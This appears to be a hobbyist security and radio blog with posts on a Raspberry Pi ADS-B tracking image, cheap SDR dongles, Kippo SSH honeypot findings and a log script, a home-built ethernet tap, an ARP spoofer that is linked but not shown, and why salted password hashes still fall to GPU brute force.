RasPi + SDR + ADS-B = awesome

A lot of people have combined a RasPi and a SDR dongle to get a low power consumption ADS-B tracker. Tomasz Miklas has created an image for the Raspberry Pi, that has everything that is needed to run your own aircraft tracking “service” already set up. I’ve finally had a chance to experiment with it and this will be my short review.

First of all, I have to say I’m really sorry to Tomasz, because he send me the image at the 10th of October to test it out before releasing it publicly and I’m posting this two months later. Sorry mate.

Tomasz, has a well written post explaining how the image works, so I’ll skip the details. All tests were performed using a dongle with a R820T chip and the stock omnidirectional antenna. Since I moved recently, I didn’t have the time to construct a proper antenna, yet even with such an antenna the result were pretty good.

So, you download the image, `dd` it to a SD card, plug your SDR dongle, power it on, point your browser to the IP the RasPi obtained through DHCP and … and everything simply works out of the box. At least it did for me.

I was really surprised by how lightweight the whole setup was. After one and a half hours of uptime, two clients connected to the server and, receiving messages from two planes, the RasPi reported that it only used 30 megs of RAM and the CPU was pinned at 35% the whole time, with 4-5% of it being htop itself. The process using the CPU was of course dump1090, which does all the heavy lifting. Unfortunately, due to the time I tested the image (4 AM) and my location, there weren’t many planes (two simultaneously at max), so I don’t know how dump1090 behaves under a lot of load/traffic.

As mentioned above, I was using the stock antenna that came with the SDR dongle, but I was still able to get a signal from planes that were 72km away on average! On some of my previous tests under Windows and ADSB#, I only got 28km of range. A lot of things have changed since then though, mainly my new house and my antenna placement, or perhaps the old one was a Faraday cage? Either way, for the time being, I’ll leave the RasPi running and further report on its performance after a bit of testing.

If you own a RasPi and a SDR dongle, give the image a try. It may not be something you haven’t seen or done already, but it certainly is the easiest way to monitor ADS-B traffic, at least to my knowing. I know, I’ll be keeping a copy of the image in a SD card because it’s so handy.

An intro to SDR

For the past two months I’ve been reading about SDR and everything related to radio telecommunications. For those that don’t know what SDR is (and are too bored to click the previous link), Software Defined Radio is a system that implements hardware subsystems of a typical radio in software. People have been designing their own SDRs with FPGAs for quite some time now, but in the last year there has been a huge “revolution”. It turns out that a lot of cheap USB digital TV tuners based on the Realtek RTL2832U chip can be tuned at a wide range of frequencies.

For a list of supported devices you can check this page. I’ve bought two devices to experiment with, one is an EzTV 645 using the FC0013 chip, while the other one is using the Rafael Micro R820T chip (bought it from ebay for about 8 euro). I mainly bought them to experiment with ADS-B and NOAA weather satellites. Due to university assignments I didn’t have the time for the latter, but I’ve spent some mornings watching airplanes taking on and off from a nearby airport. Other interesting things to listen to are: ATC, ATIS, pager traffic, car keyfobs and anything else that is above in your chip range. As mentioned earlier, due to the lack of time, for the time being I’ve only experimented with ADS-B traffic.

I’ve done all my testing in Windows 7 using SDR# and ADSB# in conjunction with Virtual Radar Server. So far, using the stock antenna with both dongles, the one with the R820T is performing way better than the FC0013 one. There is less noise and it’s better at picking signals from afar. Moreover, it has a better tuning range, although it differs from dongle to dongle and it depends more or less on your luck.

I live fairly close to an airport so I get a good signal of any plane taking on or off. The maximum range I’ve achieved with the R820T dongle and stock antenna (omnidirectional) is 28km. I’ve checked the results I get against flightradar24.com and they are spot on. One feature of ADSB# I like is the ability to share your findings with servers that accept ADS-B traffic, like contributing to flightradar24.com.

I won’t go in more details at the moment, since I’m tight on time, but for those of you that are interested in getting a SDR capable dongle, do some research first. Not all dongles have what is called an esd protection diode. As its name implies, it’s a diode (a passive component allowing current to flow in one direction only, like a check valve) that protects against electrostatic discharge. A lot of people have “fried” their dongles because they didn’t have said diodes. By leaving the antenna outside, the wind can create static charge on the antenna and fry the chip inside the dongle. Both of my dongles came with those diodes, but if you plan on buying one, read some comments first or if buying from ebay ask the seller for a picture of the dongle. The diodes are the little black things I’ve circled in red near the antenna connector.

For those of you that want more info on ADS-B I suggest watching this amazing talk by Render Man (http://www.renderlab.net).

eztv645(1)

EzTV645 esd diode

eztv645(2)

EzTV645 dongle

r820t(3)

Esd diode and R820T chip

My Kippo findings after three months

Three months ago I installed Kippo in a low end VPS of mine. About a month after that, I got bored of manually checking kippo everyday so I made a small script to automate the process. Fast forward another two months and here we’re.

In three months time, I had 122.487 bruteforce attempts from 339 different IPs. Of said attempts, 130 were successful on finding the correct password(s). I set up Kippo to accept two different easy-to-guess passwords for the root account. People interacted with the honeypot (as in logged in and tried to download files, etc) only 16 times out of those 130. The rest were just bots logging in and logging out.

The first command every attacker runs after logging in is `w`, followed by `cat /proc/cpuinfo`. Ten out of the sixteen attackers logged out after seeing the results of /proc/cpuinfo. I guess people know about Kippo and recognize it by /proc/cpuinfo. After noticing that, I changed mine – something I suggest everyone to do as Kippo by default is easily identified.  There were a few hits where people thought it’s an actual server and not a honeypot and tried downloading some of their tools. I disabled `wget` but made it look like it’s there, so it was funny seeing them figuring out why they can’t download their files.

Unfortunately, I haven’t come across any new web shell; only some IRC bots, so nothing interesting to post about there.

Of the 122.487 previously mentioned attempts, I’ve gathered 30.048 unique passwords (around 29.500 if you don’t count extra whitespace) and 8.525 usernames. I run both of the lists containing passwords and usernames against pipal. By far (49.12%) the most used username is root followed by test (0.8%).

For more details on both of the reports check my Kippo findings page.

 

 

Making an (ugly) ethernet tap

A long time ago, I saw this in the Hak5 store. After reading about it in mossmann’s blog, I found somewhat interesting that using this easily built device you can HACK THE PLANET.

An ethernet tap is a passive device used to monitor traffic between two hosts using a third one. For more info on network taps read here.

The idea behind it is very simple, but in order to understand it we must first understand how data is transmitted through the ethernet cable. The ethernet cable, commonly called Cat 5 contains four pairs of twisted wires. 100BASE-TX (fast ethernet) only uses two pairs of these wires, one pair for transmitting data (TX) and one for receiving (RX). So, in order to intercept the data sent from one of the hosts, we just need to connect the host’s TX line with our RX one. Likewise, to intercept incoming data to the host, we need to connect the host’s RX line with our RX line.

Note that we can’t connect both the host’s TX and RX in the same RX line, since fast ethernet is full duplex. To overcome this we need to use two taps, one for the received data and one for the transmitted.

(For more details on how to make one, read these two posts: #1, #2)

After a bit of soldering, this is what I ended up with.

Top view of the ethernet tap (euro coin is for size comparison)

Top view of the ethernet tap (euro coin is for size comparison)

Bottom view of the ethernet tap

Bottom view of the ethernet tap

The two ports near the euro coin are to be connected on the pc and the router, while the other two ports are for intercepting the traffic. As stated previously, one is for the transmitted data and the other for the received. To use them both at once, you need either a pc with two network cards or an ethernet to usb adapter.

Link overflow

I’ve been in assignment hell for the past two months, thus haven’t really posted anything. To make things even worse, I got sick four days ago. Not having the clearest clarity of thought while being sick, I ended up watching a lot of Defcon/Shmoocon talks and reading a lot of posts. Well that and DotA 2 :P

I’ll link the talks that I enjoyed the most.

RFID

All three talks are by Kristin Paget (formerly known as Chris Paget), with the first one being the most scary for me. Having the ability to read 900Mhz RFID tags from afar is, at the very least, intimidating.

Lockpicking

Lockpicking always fascinated me and recently I started looking more and more into it. Schuyler Towne is an amazing speaker that really knows how to captivate a crowd. Moreover, he has an excellent lockpicking series on youtube for anyone interested.

General pentesting

 Random talks

Kippo-log.sh – A way to easily get information from kippo

As I continued my adventures with Kippo, I got tired of manually reviewing daily activity by querying MySQL tables. As shown here, with an excellent post by Ion, there are a lot of scripts/web apps/one liners to get various bits of information from Kippo. Since, none of them seemed to do what I had in mind, I created kippo-log.sh.

Its purpose is simple. Print a bunch of info like:

  • Total log in attempts
  • Total unique passwords tried
  • The number of log in attempts since the last execution of the script and how many of them were successful, as well as the number of actual sessions (not just random “drive bys” by bots).

Since I had disabled “wget” in my installation, I needed a quick way to see what files the attackers had tried to download. This can be accomplished with the flag -f X, where X is a number. By using the -f option, the script will print the URLs of files downloaded with wget in the last X days.

If I find the time, I might add a couple more features. For now, though, it’s more than enough for my needs.

Update: I added two more flags -p X and -u X, where X is a number.

-p will print the X most used passwords, while -u will print the X most used usernames.

Having fun with Kippo

A couple of days ago I installed Kippo in a VPS with 128mb RAM. I’m not gonna post how to install and set up Kippo, as there are gazillion posts about it already (two of the best #1#2 ). What I’m gonna gonna post is how to keep it lightweight, what I like about it and some early results.

Keeping it lightweight

If you plan on using MySQL to log everything keep in mind that, by default, MySQL is kind of a memory beast. In order to reduce its memory consumption, I edited “/etc/mysql/my.cnf“, which is the global configuration file for MySQL. In Debian, you can find example configuration files in “/usr/share/doc/mysql-server-????/“, where ???? equals your MySQL version number. The file called my-small.cnf is suitable for servers with less that 64mb RAM, so that’s the one I used. I also added “skip-innodb” as an option.

For those of you that want a web server installed, I recommend using nginx instead of Apache as it needs less resources to run.

At the moment, with the system running what it needs + nginx + MySQL + Kippo, it only uses 68mb of RAM.

What I like about Kippo
  • It’s dead simple to have it up and running.
  • It records everything the attacker types, exactly the way he types it. That includes any typos he makes and corrected with backspace or his typing speed.
  • Any files the attacker downloads are saved locally for further inspection.
  • You can add any files you want to its fake filesystem so that it looks like a real machine with a lot of users etc.
How about some early results

I started running Kippo three days ago. So far, I’ve had 3915 attempts at logging in. Four of them were successful but only in one of them someone interacted with the honeypot. This page will be updated every Monday with some of the most interesting findings. For the time being, it has a list containing all the usernames/passwords tried so far-duplicates included- sorted by username.

 

Arp spoofing with Python

I decided to reinvent the wheel by making an ARP spoofer in python using raw packets, thinking it would be a nice practice.

What is ARP, ARP spoofing/poisoning, ARP cache?? How do they work and why should we care? Since all of these things have been written and explained before, in a better way than I could explain them, here you go.

You can find the script here. It’s more like a proof of concept than a fully working program, since I haven’t really tested it in more than two computers, so I don’t know if it’ll work for sure. Its purpose is purely instructional. The script is licensed under the MIT license so you are free to change/modify it to your heart’s content.

Thoughts on password hashing, salted passwords and CrackStation.net

Recently, I was messing around with password hashes and I stumbled upon a (new) interesting hash cracking site, CrackStation.net. CrackStation has the largest hash database I’ve seen and uses binary search in sorted hash look up tables, so it’s really fast. In order to comprehend the size of its hash database, the look up table for md5 contains 15,171,326,912 entries (190 GB in size!!).

Guess, all of you have heard about how eHarmony.com, LinkedIn.com and Last.fm had part of their databases leaked online. Funny thing is, all three of these sites didn’t use salt on users passwords. As described here, salting each password with a unique salt prevents cracking the hashes by using rainbow tables.

As examples of crackstation’s power, it was able to crack 275,860 and 31,831 hashes from eHarmony and  LinkedIn leaks respectively.

But is that all? I remember reading Jeff Atwood’s “Speed Hashing”, an article about the speed of calculating hashes nowadays, a while back. With two ATI Radeon 7970 and oclHashcat he was able to calculate 16.000 million md5 hashes per second. That means it takes 4 minutes for all 7 character passwords containing uppercase, lowercase and numbers. In some cases, people have even reported 23.000 million hashes, aka 2.55 minutes for 7 character passwords or 2.63 hours for all 8 character passwords.

Considering that the average password is ~7.5 chars long (according to “Analyzing the LulzSec Password Leak”, in an analysis of 62.000 passwords released by Lulzsec last year), 43% of the passwords use only lowercase characters. That means, with 23.000 million h/s and 8 character long passwords we need 9 seconds for all possible combinations. Even worse, 20% of the passwords contained only numbers, meaning 0.004 seconds for the passwords with 8 character length. Which means that even if the passwords were salted it would be pretty easy and fast to crack them using brute-force.

To sum up, unsalted passwords are certainly a big no-no, while salted passwords with today’s hardware are only as good as the complexity of the password itself. What websites should do is, enforce good password policies (what NOT to do #1, #2) and use a hashing algorithm that’s been created for password hashing exclusively (like scrypt/bcrypt/PBKDF2). Those functions salt the passwords on their own. If, for some reason a hash function that doesn’t contain salt by default is used(md5,sha1,sha-256,etc), you should salt the passwords on your own.

Two random TED talks I enjoyed

Here are two TED talks I really enjoyed.

The first one is by Vijay Kumar and his team and they are working on autonomous and agile quadrotors.

The second one is by Dennis Hong of RoMeLa showcasing some of their amazing work.